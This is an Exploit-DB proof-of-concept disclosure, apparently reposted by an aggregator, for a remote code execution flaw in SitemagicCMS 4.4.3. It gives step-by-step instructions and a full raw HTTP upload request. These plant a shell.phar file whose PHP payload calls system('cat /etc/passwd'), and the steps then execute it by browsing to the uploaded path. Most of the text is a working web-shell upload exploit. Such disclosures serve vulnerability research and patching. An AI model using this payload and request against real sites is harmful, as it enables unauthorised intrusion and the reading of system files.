[webapps] SitemagicCMS 4.4.3 - Remote Code Execution (RCE)
2023-5-23 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:11 收藏

#Exploit Title: SitemagicCMS 4.4.3 Remote Code Execution (RCE)
#Application: SitemagicCMS
#Version: 4.4.3
#Bugs:  RCE
#Technology: PHP
#Vendor URL: https://sitemagic.org/Download.html
#Software Link: https://github.com/Jemt/SitemagicCMS
#Date of found: 14-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux 

2. Technical Details & POC
========================================
steps: 
1. go to content then files 
2. upload shell.phar file but content as  <?php echo system("cat /etc/passwd"); ?>
3. go to  http://localhost/SitemagicCMS/files/images/shell.phar



payload: <?php echo system("cat /etc/passwd"); ?>



Poc request :

POST /SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1
Host: localhost
Content-Length: 492
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywPUsZSbtgJ6nAn8W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SMSESSION13bc620d275e3705=biljb454ko3ddonj5943p364lf
Connection: close

------WebKitFormBoundarywPUsZSbtgJ6nAn8W
Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="shell.phar"
Content-Type: application/octet-stream

<?php echo system('cat /etc/passwd'); ?>

------WebKitFormBoundarywPUsZSbtgJ6nAn8W
Content-Disposition: form-data; name="SMPostBackControl"


------WebKitFormBoundarywPUsZSbtgJ6nAn8W
Content-Disposition: form-data; name="SMRequestToken"

60a7a113cf94842a197912273825b421
------WebKitFormBoundarywPUsZSbtgJ6nAn8W--
            

文章来源: https://www.exploit-db.com/exploits/51464
如有侵权请联系:admin#unsafe.sh